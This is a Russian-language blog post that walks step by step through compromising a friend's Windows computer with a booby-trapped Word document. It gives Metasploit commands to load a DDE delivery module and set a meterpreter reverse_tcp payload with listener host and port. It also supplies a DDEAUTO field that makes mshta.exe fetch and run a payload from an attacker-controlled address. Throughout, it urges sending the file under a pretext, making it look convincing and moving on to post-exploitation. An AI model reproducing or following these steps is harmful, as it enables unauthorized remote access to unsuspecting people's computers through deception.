Найти в Дзене
⚡Информационная безопасность
728 подписчиков

Взлом твоего друга через MS Office

223
2 мин
Любите своих друзей и не заставляйте их скучать. Привет, Анон. Сегодня я хочу показать тебе, как можно получить доступ через файл MS Office. Это очень простая атака, так как можно придумать много предлогов для отправки документов. Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Далее добавим эту утилит
Оглавление

Любите своих друзей и не заставляйте их скучать.

Взлом твоего друга через MS Office
Взлом твоего друга через MS Office

Привет, Анон. Сегодня я хочу показать тебе, как можно получить доступ через файл MS Office. Это очень простая атака, так как можно придумать много предлогов для отправки документов.

Теория

DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл)

Установка

Необходимые составляющие для проведения атаки:

  • Устройство с Kali Linux.
  • Устройство с Windows.
  • Microsoft Office (Word).

Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

-2

Далее добавим эту утилиту в папку с эксплоитами Metasploit:

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

-3

После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей:

msfconsole
reload_all

-4

После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды:

use exploit/windows/dde_delivery

-5

Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом:

set SRVHOST 192.168.177.141
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit

-6

Подготавливаем документ MS Office

После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9).

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”}

-7
-8

После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями.

Готовая ссылка
Готовая ссылка
Получаем сессию
Получаем сессию

Заключение

Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.

Кибербезопасность
25,6 тыс интересуются